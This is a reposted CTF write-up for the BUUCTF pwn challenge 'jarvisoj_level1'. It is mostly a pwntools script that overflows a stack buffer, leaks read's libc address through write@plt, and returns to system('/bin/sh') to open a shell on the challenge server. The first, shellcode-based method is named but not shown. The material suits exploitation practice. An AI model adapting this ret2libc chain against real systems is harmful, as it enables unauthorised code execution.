[BUUCTF-pwn]——jarvisoj_level1
作者:互联网
[BUUCTF-pwn]——jarvisoj_level1
第一种直接构造shellcode
writeup
第二种泄露libc进行操作
from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",26361)
#p = process("./level1")
elf = ELF("./level1")
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
main = elf.symbols['main']
#gdb.attach(p)
payload = 'a' * (0x88 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(read_got) + p32(4)
p.send(payload)
read_addr = u32(p.recv(4))
log.success("read_addr ---->:" + hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
info("libc_base -----> " + hex(libc_base))
sys = libc_base +libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 4) + p32(sys) + p32(main) + p32(binsh)
p.send(payload)
p.interactive()
标签:BUUCTF,addr,level1,libc,elf,p32,jarvisoj,read,pwn 来源: https://blog.csdn.net/Y_peak/article/details/114916604